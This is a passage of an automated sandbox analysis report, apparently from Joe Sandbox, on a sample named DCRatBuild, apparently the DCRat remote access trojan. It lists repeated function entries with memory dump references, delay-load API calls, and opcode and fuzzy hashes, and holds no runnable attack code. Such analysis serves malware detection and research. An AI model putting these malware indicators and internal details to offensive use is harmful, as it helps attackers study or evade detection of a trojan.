                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: ea206b4200fbea5cd9cd13c544e9a75607a577c9c6ca3aa22639585035233c12
                                      • Instruction ID: 7391f287b1b18d978e11d48f81fa105070cbd41c226e059c9e5567f7a8d98779
                                      • Opcode Fuzzy Hash: ea206b4200fbea5cd9cd13c544e9a75607a577c9c6ca3aa22639585035233c12
                                      • Instruction Fuzzy Hash: 89B012A226C4016C314C61046D26E76122CC5C2B31330401AB10ED00C1D4409E873932
                                      Function 00F1D8FC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: cf4c51665102fe405f5654b6253d46410986f58347a72a4a06dd31bcd8de06d1
                                      • Instruction ID: 64e45ef24f0c5fd927a62b4f35c8ba153925c36841caa24dbf59f3ee88fa4ef6
                                      • Opcode Fuzzy Hash: cf4c51665102fe405f5654b6253d46410986f58347a72a4a06dd31bcd8de06d1
                                      • Instruction Fuzzy Hash: 44B012A226C4016C314C61056C26E76122CC5C2B31330401AB10ED00C1D4409D863932
                                      Function 00F1D8E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: b9c4320999b4ff6b96c17a34f7622a456bfe3f550535e50a16568ffdafb6c638
                                      • Instruction ID: 08161f02189185eda3cccc9a002548547dffb88ec9a6c8ed78263d053a224f61
                                      • Opcode Fuzzy Hash: b9c4320999b4ff6b96c17a34f7622a456bfe3f550535e50a16568ffdafb6c638
                                      • Instruction Fuzzy Hash: FEB012A226C5016D318C61046C26E76122CC5C2B31330411AB10ED00C1D4409DC63932
                                      Function 00F1D8DE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 13a4e0d88bfef0a1272467baaa8338a752d0b920d2ff31790424889b1d243046
                                      • Instruction ID: 6c5e310668fe80c01391d779ce465632d09951499ea02bad6aa7ea21ca5ac651
                                      • Opcode Fuzzy Hash: 13a4e0d88bfef0a1272467baaa8338a752d0b920d2ff31790424889b1d243046
                                      • Instruction Fuzzy Hash: 0AB012A226C4016C314C61046C26E76122CC5C3B31330801AB50ED00C1D4409D8A3932
                                      Function 00F1D8C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 539f4596b72ebe3a968a34a8d440e25fdd69c7262890528d5c6b6b2092872f59
                                      • Instruction ID: 2f08fb3810d5c8a8f623607da33bbf8f6fd67b736e014a9081dc8972addbb78a
                                      • Opcode Fuzzy Hash: 539f4596b72ebe3a968a34a8d440e25fdd69c7262890528d5c6b6b2092872f59
                                      • Instruction Fuzzy Hash: 6CB012D227C5016D318C61046C26E76122CC5C2B31330811AB10AE01C1D4409CCB3832
                                      Function 00F1D8CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 82e314a7e87781149fec6f02a1c3403d9bdb485aacc192d747e36b8954307844
                                      • Instruction ID: 78616d2e3fd8d692ee86e76aaff9770704e8831ea34d392711b021e061980a0d
                                      • Opcode Fuzzy Hash: 82e314a7e87781149fec6f02a1c3403d9bdb485aacc192d747e36b8954307844
                                      • Instruction Fuzzy Hash: CEB012D226C4016C314C61046D26E76122CC5C2B31330801AB10AE01C1D4509D8F3832
                                      Function 00F1D8B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: d4309f24a314a2901c0e31a1f766b7db5d802606b2b24534448866d2a7508184
                                      • Instruction ID: 6890b7a85187537ab144c085bb831ee05ed6fc6b03e97cc288913ef03d8b4d0b
                                      • Opcode Fuzzy Hash: d4309f24a314a2901c0e31a1f766b7db5d802606b2b24534448866d2a7508184
                                      • Instruction Fuzzy Hash: 13B012D226C4016C314C61046C26E76122CC5C3B31330C01AB50AE01C1D4409C8B3832
                                      Function 00F1D8AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: c4b34effc8dc2a0902126416f962e064eeac63cdbaf2272481a4f5a89575acea
                                      • Instruction ID: af82abbbea38f6db35b02d71ac89f3c4b5e9f07bd110c681b6e68bd800dc6136
                                      • Opcode Fuzzy Hash: c4b34effc8dc2a0902126416f962e064eeac63cdbaf2272481a4f5a89575acea
                                      • Instruction Fuzzy Hash: FBB0129626C5056C314C61046C66E7B122CE5C2B31330401AB10AD00C1D4409C863932
                                      Function 00F1D891 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: eb71b5bd728c2588f1456b91113e05321bad5eb0b1b67eb11866fa47206a7b79
                                      • Instruction ID: f27a8370d3440017e738df5e1827c91769863891f49c59f0c91e2ce0ad1ea924
                                      • Opcode Fuzzy Hash: eb71b5bd728c2588f1456b91113e05321bad5eb0b1b67eb11866fa47206a7b79
                                      • Instruction Fuzzy Hash: 7DB0129626C7017D314C21006C76D7B122CC5C3B31330452AB10AE00C1D4409CCA7832
                                      Function 00F1D942 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 49d2484d6a7aaf68964e062fd7184416f979f4743e18bcd29a5410ad8d363e10
                                      • Instruction ID: 68a045cd18ace14d2406c04a7927797167dd80c01be923a49511914ad89699d8
                                      • Opcode Fuzzy Hash: 49d2484d6a7aaf68964e062fd7184416f979f4743e18bcd29a5410ad8d363e10
                                      • Instruction Fuzzy Hash: D3B012A226D4016C314C61046E26E7612ACC5C2B31730401AB10AD00C1D5409DC73832
                                      Function 00F1D924 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: 1f8139af6460b496f37586d3679a05498fea6a41f092016b9bb4c8fd8a009a9f
                                      • Instruction ID: 04e5a1a82cce87d8dab123df13cef8872175eb5f7909c7e08eef5cd6f8d18e36
                                      • Opcode Fuzzy Hash: 1f8139af6460b496f37586d3679a05498fea6a41f092016b9bb4c8fd8a009a9f
                                      • Instruction Fuzzy Hash: 2FB0129227D4016C314C61046C66E76126DCAC2B31730401AB10AD00C1D4409C863832
                                      Function 00F1D92E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: cccfd221a13ed33ab426e156498ccd27609ea28f2970b4075e165009196e0f7a
                                      • Instruction ID: 53fc65cef0b27fa7fed76f2754c0ec3226657d7ca9cb1c4546648b67bca3cd21
                                      • Opcode Fuzzy Hash: cccfd221a13ed33ab426e156498ccd27609ea28f2970b4075e165009196e0f7a
                                      • Instruction Fuzzy Hash: 4DB0129226D4016C314C61146D26E76126CC5C3B31330801AB60AD00C1D640DCC63832
                                      Function 00F1D910 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: bf8aafbba10d2164003e522257ff2e5989d2b57ab5a6680d46654449bfd42bbe
                                      • Instruction ID: 7df9e4447cfacbcb5755eb14aad6eb65173ef9a3ae32e5c38c9f6a7da4836153
                                      • Opcode Fuzzy Hash: bf8aafbba10d2164003e522257ff2e5989d2b57ab5a6680d46654449bfd42bbe
                                      • Instruction Fuzzy Hash: 4AB012A226D5016D318C62046C66E76122DC6C2B31730411AB10AD00C1D4409CC63832
                                      Function 00F1D906 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: b2dff8224fbaedde657ec3736f2d8df30a0cd0f456df853e760d67e3859a4475
                                      • Instruction ID: d4efeacf1d2643b2774f5782ad1a3b9def98c98af52a83f8ea90ce212e2f0723
                                      • Opcode Fuzzy Hash: b2dff8224fbaedde657ec3736f2d8df30a0cd0f456df853e760d67e3859a4475
                                      • Instruction Fuzzy Hash: D0B0129226D4016C314C61046C66E76122DC6C3B31730801AB50AD00C1D4409C863832
                                      Function 00F1D8D9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: I=u
                                      • API String ID: 1269201914-3032091488
                                      • Opcode ID: e0bfba00a04e47cc1ab8e7c92245dffd0471c480097a3f7df04c3c734b613d63
                                      • Instruction ID: c416ebde8ed06d3cbf46f2bda1ba23bcd9b3a81961f64eb0115b07acb35b6108
                                      • Opcode Fuzzy Hash: e0bfba00a04e47cc1ab8e7c92245dffd0471c480097a3f7df04c3c734b613d63
                                      • Instruction Fuzzy Hash: 66A0129216C0027C300C21006C26D76122CC4C1B313304409B007900C0D44058863831
                                      Function 00F1D997 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
